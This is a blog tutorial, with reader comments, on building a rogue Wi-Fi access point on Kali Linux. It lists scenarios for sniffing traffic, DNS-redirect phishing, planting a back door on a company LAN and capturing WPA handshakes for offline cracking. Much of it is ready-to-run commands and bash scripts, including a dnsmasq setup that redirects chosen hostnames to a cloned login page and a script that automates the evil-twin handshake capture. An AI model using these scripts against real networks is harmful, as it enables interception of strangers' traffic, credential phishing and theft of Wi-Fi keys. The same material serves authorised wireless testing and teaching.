Rogue Access Point using Kali Linux

A Rogue Access Point (RAP) is a fake Wi-Fi access point set up so that clients connect to it instead of a legitimate one; everything those clients send then passes through the attacker's machine and can be intercepted.
Basically you have a PC (Kali Linux live in this case) with two interfaces: a wired one (eth0) connected to a working network and a wireless one (wlan0).
The wireless card is configured as an access point (AP) and a bridge is created to link the wired and wireless connections.
When a user connects to the new hot spot, his traffic is bridged, through the PC, onto the wired network and from there routed to its destination (the internet).
I use the airbase-ng command (aircrack-ng suite) for these operations.

Some scenarios:
Sniffing traffic
I set up a RAP and start Wireshark, ettercap or another network sniffer. Every connection that passes through my PC is intercepted. Cleartext protocols (HTTP, plain DNS, SMTP without STARTTLS) give up their content directly; for TLS traffic only the metadata (DNS names, SNI, endpoints, timing) is visible unless the client can also be tricked into accepting a forged certificate.
Phishing
I set up a RAP and force it to use my DNS server. If someone connects to me and starts to surf I can redirect traffic using my DNS and, with a cloned login page, implement some kind of phishing. This works against plain HTTP; HSTS and certificate validation get in the way for sites the browser already knows as HTTPS-only.
Company network back door
I set up, perhaps using a small Raspberry Pi, an access point that uses the company network as its wired interface. This is a hot spot directly connected to the company LAN, reachable by anyone within radio range.
Caffe Latte attack
Looking at the wireless packets you can see clients probing for the access points they previously registered (e.g. MY_NETWORK). I can set up an access point with the same SSID the client is searching for. When the client, which is looking for a known SSID, finds my RAP named MY_NETWORK it immediately tries to connect. I can use this connection to capture WPA handshakes or WEP packets and try to recover the keys. Strictly speaking the Caffe Latte attack is the WEP variant, which tricks the client into producing enough encrypted ARP packets to crack the key; the WPA handshake capture is the same evil-twin idea applied to WPA.
Extend my connection
I have a notebook connected to a LAN but no access point. I also have a smartphone and I want a wireless connection on the fly.

The basic configuration:
– eth0, the wired connection linked to the network
– a DHCP server working on the LAN where eth0 is connected (the clients of the RAP get their addresses from it, through the bridge)
– wlan0, a wireless interface that can be put into monitor mode

I start monitor mode on wlan0:

root@kali:~# airmon-ng start wlan0

This will create the mon0 interface. (Current aircrack-ng releases name it wlan0mon instead; use whatever name airmon-ng prints in the commands that follow.)
Now I set up an AP on mon0, named “MY_network”, on channel 11 with WEP authentication. The -w argument is the WEP key in hex: 26 hex digits for a 104-bit key, as here, or 10 for a 40-bit key; clients have to be given the same key. I can also set it up as an open network without a password by omitting -w (see airbase-ng --help). WEP is deprecated and some current clients refuse to join a WEP network, so for a test the open network is the more reliable choice.

root@kali:~# airbase-ng --essid MY_network -c 11 -w abcdefabcdefabcdefabcdef12 mon0

This will create the at0 interface, a tap device that carries the traffic of the associated clients. Leave airbase-ng running in this terminal.
Now that the AP is started, in another terminal window I make a bridge named test-bridge and link at0 to eth0 using bridge-utils. Note that in Kali Linux bridge-utils has to be installed (apt-get install bridge-utils) in order to use the brctl command.

root@kali:~# brctl addbr test-bridge
root@kali:~# brctl addif test-bridge eth0
root@kali:~# brctl addif test-bridge at0

I can release the IPs of eth0 and at0. The two interfaces are now ports of the virtual bridge and don't need an IP anymore (note that dropping the address of eth0 also drops the default route that went through it; it is re-added on the bridge below):

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 down
root@kali:~# ifconfig at0 0.0.0.0 up

I also enable IP forwarding. A bridge forwards frames at layer 2 and does not strictly need it, but it does no harm and it is required if at0 and eth0 are later routed instead of bridged:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

At the end I configure test-bridge. Differently from eth0 and at0, the bridge needs an IP of the LAN where eth0 is connected: pick a free address outside the DHCP pool, or simply run dhclient test-bridge to get one from the LAN DHCP server.

root@kali:~# ifconfig test-bridge 192.168.x.y netmask 255.255.255.0 broadcast 192.168.x.255 up
root@kali:~# route add default gw 192.168.x.1
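The bridge steps above collected into one script, as an added example that is not the post's own code: it uses the ip command where the post uses ifconfig (same effect), adds a teardown that undoes the changes without rebooting, validates the WEP key format that airbase-ng's -w expects, and has a DRY_RUN mode that prints the commands instead of running them so the plan can be reviewed without root. The interface names (eth0, at0, test-bridge) and the 192.168.1.x addresses are placeholders; it assumes airbase-ng is already running in another terminal and that a DHCP server is reachable behind eth0.

```shell
#!/bin/bash
# rap-bridge.sh: bring a bridged rogue AP up or tear it down.
# Added example, not the post's own script. Assumes: wlan0 already in monitor
# mode and airbase-ng already running in another terminal (it created at0),
# bridge-utils installed, a DHCP server reachable behind ETH. Every interface
# name and address passed on the command line is a placeholder.
set -eu

# With DRY_RUN=1 every command is printed instead of executed, so the plan can
# be reviewed (or tested) without root and without wireless hardware.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# airbase-ng -w takes the WEP key as hex digits: 10 (40-bit) or 26 (104-bit).
wep_key_ok() {
    case "$1" in
        *[!0-9a-fA-F]*) return 1 ;;   # anything that is not a hex digit
    esac
    [ "${#1}" -eq 10 ] || [ "${#1}" -eq 26 ]
}

# rap_up ETH AT BRIDGE IP/PREFIX GATEWAY
# ETH and AT become plain bridge ports (no address); the bridge takes the LAN
# address and the default route, exactly as the post does with ifconfig/route.
rap_up() {
    local eth=$1 at=$2 br=$3 addr=$4 gw=$5
    run brctl addbr "$br"
    run brctl addif "$br" "$eth"
    run brctl addif "$br" "$at"
    run ip addr flush dev "$eth"          # drops eth's address and its default route
    run ip addr flush dev "$at"
    run ip link set "$eth" up
    run ip link set "$at" up
    run sysctl -w net.ipv4.ip_forward=1   # harmless for a bridge, needed if routed later
    run ip addr add "$addr" dev "$br"
    run ip link set "$br" up
    run ip route replace default via "$gw"
}

# rap_down ETH AT BRIDGE
# Undo in reverse order and get ETH a fresh lease. airbase-ng (Ctrl-C in its
# terminal) and monitor mode (airmon-ng stop mon0) are stopped separately.
rap_down() {
    local eth=$1 at=$2 br=$3
    run ip link set "$br" down
    run brctl delif "$br" "$at"
    run brctl delif "$br" "$eth"
    run brctl delbr "$br"
    run sysctl -w net.ipv4.ip_forward=0
    run dhclient "$eth"
}

rap_main() {
    case "${1:-}" in
        up)
            [ $# -eq 6 ] || { echo "usage: $0 up ETH AT BRIDGE IP/PREFIX GATEWAY" >&2; return 2; }
            rap_up "$2" "$3" "$4" "$5" "$6" ;;
        down)
            [ $# -eq 4 ] || { echo "usage: $0 down ETH AT BRIDGE" >&2; return 2; }
            rap_down "$2" "$3" "$4" ;;
        *)
            echo "usage: $0 up ETH AT BRIDGE IP/PREFIX GATEWAY | down ETH AT BRIDGE" >&2
            return 2 ;;
    esac
}

# Runs only when invoked with arguments, e.g.:
#   DRY_RUN=1 ./rap-bridge.sh up eth0 at0 test-bridge 192.168.1.50/24 192.168.1.1
#   sudo ./rap-bridge.sh up eth0 at0 test-bridge 192.168.1.50/24 192.168.1.1
#   sudo ./rap-bridge.sh down eth0 at0 test-bridge
if [ $# -gt 0 ]; then
    rap_main "$@"
fi
```

Run the up command with DRY_RUN=1 first and compare the printed plan with the brctl/ifconfig/route sequence above; the only difference is the address handling, where ip addr flush replaces ifconfig 0.0.0.0.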

Note that these are temporary operations: the bridge, the addresses and the virtual interfaces are discarded by rebooting the system (or, without rebooting, by stopping airbase-ng, deleting the bridge with brctl delbr and asking for a new lease on eth0).
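When the LAN behind eth0 offers no DHCP server (a NAT'd virtual machine is a common case) or when the phishing scenario above needs the AP to hand out my own DNS server, the Kali box can serve DHCP and DNS itself and route at0 to eth0 with NAT instead of bridging. The following is an added example, not the post's own code: it generates a dnsmasq configuration for at0 and applies the iptables NAT rules. The 192.168.50.0/24 subnet, the at0/eth0 names, the upstream resolver and login.example.com are placeholders; the address= line answers that name with the AP's own address, which is where a cloned login page would be served.

```shell
#!/bin/bash
# rap-dnsmasq.sh: own DHCP + DNS on the AP's at0 interface, NAT to eth0.
# Added example, not the post's own code. Assumes airbase-ng is running and has
# created at0, and that dnsmasq and iptables are installed. Subnet, interface
# names, upstream resolver and redirected hostnames are placeholders.
set -eu

# rap_dnsmasq_conf AT AP_IP POOL_START POOL_END HOSTNAME...
# Prints a dnsmasq configuration: DHCP pool on AT, AT's address as router and
# resolver for the clients, every HOSTNAME resolved to the AP itself, everything
# else forwarded to the upstream resolver.
rap_dnsmasq_conf() {
    local at=$1 ap_ip=$2 pool_start=$3 pool_end=$4
    shift 4
    cat <<EOF
interface=$at
bind-interfaces
dhcp-range=$pool_start,$pool_end,12h
dhcp-option=option:router,$ap_ip
dhcp-option=option:dns-server,$ap_ip
no-resolv
server=9.9.9.9
log-queries
log-dhcp
EOF
    local name
    for name in "$@"; do
        printf 'address=/%s/%s\n' "$name" "$ap_ip"   # redirected name -> rogue AP
    done
}

# rap_nat_up AT ETH AP_IP/PREFIX: address at0, enable routing, masquerade behind eth0.
rap_nat_up() {
    local at=$1 eth=$2 addr=$3
    ip addr add "$addr" dev "$at"
    ip link set "$at" up
    sysctl -w net.ipv4.ip_forward=1
    iptables -t nat -A POSTROUTING -o "$eth" -j MASQUERADE
    iptables -A FORWARD -i "$at" -o "$eth" -j ACCEPT
    iptables -A FORWARD -i "$eth" -o "$at" -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
}

# Example run (needs root), pool .10-.100 of the AP's /24 is derived from AP_IP:
#   sudo ./rap-dnsmasq.sh at0 eth0 192.168.50.1 login.example.com
if [ $# -ge 3 ]; then
    AT=$1; ETH=$2; AP_IP=$3; shift 3
    rap_nat_up "$AT" "$ETH" "$AP_IP/24"
    rap_dnsmasq_conf "$AT" "$AP_IP" "${AP_IP%.*}.10" "${AP_IP%.*}.100" "$@" > /tmp/rap-dnsmasq.conf
    dnsmasq --conf-file=/tmp/rap-dnsmasq.conf --no-daemon   # Ctrl-C to stop
fi
```

With --no-daemon and log-queries dnsmasq prints every lease and every DNS lookup to the terminal, which doubles as the "who connected and what did they ask for" log for the sniffing scenario.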

Extra
Starting an AP to capture a WPA handshake.

root@kali:~# airbase-ng -c 6 -e ESSID -z 2 -W 1 -F file.cap mon0

-z sets WPA1 tags (2 = TKIP); -Z does the same for WPA2 (4 = CCMP)
-W sets the WEP flag in beacons. The option -W 1 is recommended when using -z or -Z
-F where to store the cap file
mon0 is the monitor interface created by airmon-ng, as above.

Because the rogue AP does not know the passphrase the handshake never completes, but the first two messages (the AP's nonce and the client's MIC) are enough for an offline dictionary attack: aircrack-ng file.cap lists the captured networks and reports the handshake, and aircrack-ng -w wordlist file.cap tries the words against it.

Here's my old simple script to start a Rogue Access Point using Linux Bash (the prompts were in Italian; they are translated here). It may need some adjustment, but I think it will work.

#!/bin/bash
echo "---------------------------------------"
echo "Script to create a Rogue AP"
echo "---------------------------------------"
echo "Type"
echo "  To create a Rogue AP to capture the handshake type ----> 1"
echo "  To create a Rogue AP to share the connection type ----> 2"
read -r CHOSE1
if [ "${CHOSE1}" = "1" ]
then
#Start of AP creation for handshake capture
echo
echo "Creating AP for handshake capture"
echo
echo "Which ESSID do you want to use?"
read -r ESSID1
echo "On which channel should it transmit (1-11)?"
read -r CHAN1
echo "The packet capture is saved in /tmp/${ESSID1}.cap"
ifconfig wlan0 down
airmon-ng start wlan0
# airbase-ng must run on the monitor interface created by airmon-ng (mon0 here)
airbase-ng -c "${CHAN1}" -e "${ESSID1}" -z 2 -W 1 -F "/tmp/${ESSID1}.cap" mon0
#End of AP creation for handshake capture
read -r _
elif [ "${CHOSE1}" = "2" ]
then
#Start of AP creation for connection sharing
echo
echo "Creating AP for connection sharing"
echo
echo "Starting monitor mode on wlan0"
ifconfig wlan0 down
airmon-ng start wlan0
echo "Creating an AP on the virtual interface at0"
echo "Which ESSID do you want to use?"
read -r ESSID
echo "On which channel should it transmit (1-11)?"
read -r CHAN
echo "Set a password? (y/n)"
read -r CHOSE2
    if [ "${CHOSE2}" = "y" ]
    then
    echo "The password has been set to the default WEP key abcdefabcdefabcdefabcdef12"
    # airbase-ng runs in its own terminal window and keeps running after this script ends
    gnome-terminal --geometry 83x19 -x bash -c "airbase-ng --essid '${ESSID}' -c '${CHAN}' -w abcdefabcdefabcdefabcdef12 mon0"
    else
    echo "No password has been set"
    gnome-terminal --geometry 83x19 -x bash -c "airbase-ng --essid '${ESSID}' -c '${CHAN}' mon0"
    fi
# at0 exists only once airbase-ng is up in the other window: wait for it before bridging
until ifconfig at0 >/dev/null 2>&1; do sleep 1; done
echo "Creating the br0 bridge and attaching eth0 and at0 to it"
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
ifconfig eth0 down
ifconfig eth0 0.0.0.0 up
ifconfig at0 down
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Enter the settings for the new bridge interface"
echo -n "IP address: "
read -r IP
echo -n "Netmask: "
read -r NETMASK
echo -n "Broadcast: "
read -r BROAD
echo -n "Gateway: "
read -r ROUTE
ifconfig br0 "${IP}" netmask "${NETMASK}" broadcast "${BROAD}" up
route add default gw "${ROUTE}"
#End of AP creation for connection sharing
read -r _
else
echo "Invalid choice, press Enter to exit the program."
read -r _
fi

4 Responses to Rogue Access Point using Kali Linux

  1. On March 18, 2014 at 16:09 i8ft5 said:

    I was able to set up an AP, thanks. I would be interested in how to undo the changes too.

  2. On March 18, 2014 at 17:59 Peru said:

    Every bridge, IP configuration or new virtual interface created using the procedure described before will be removed when you reboot the Kali machine.

  3. On October 31, 2014 at 17:34 Hugo said:

    I can see the AP when I run the `airbase-ng` command, but as soon as I enter the `brctl addif test-bridge at0` command it disappears. Even after completing all the steps it won't show up anymore. (Other devices and when using airodump-ng mon0)

  4. On December 5, 2016 at 20:30 gopi said:

    "a DHCP server working on the LAN where eth0 is connected"..
    How do I do this??? What does it mean..
    I'm using NAT in VirtualBox and the latest Kali version..
    The DHCP server is my problem…
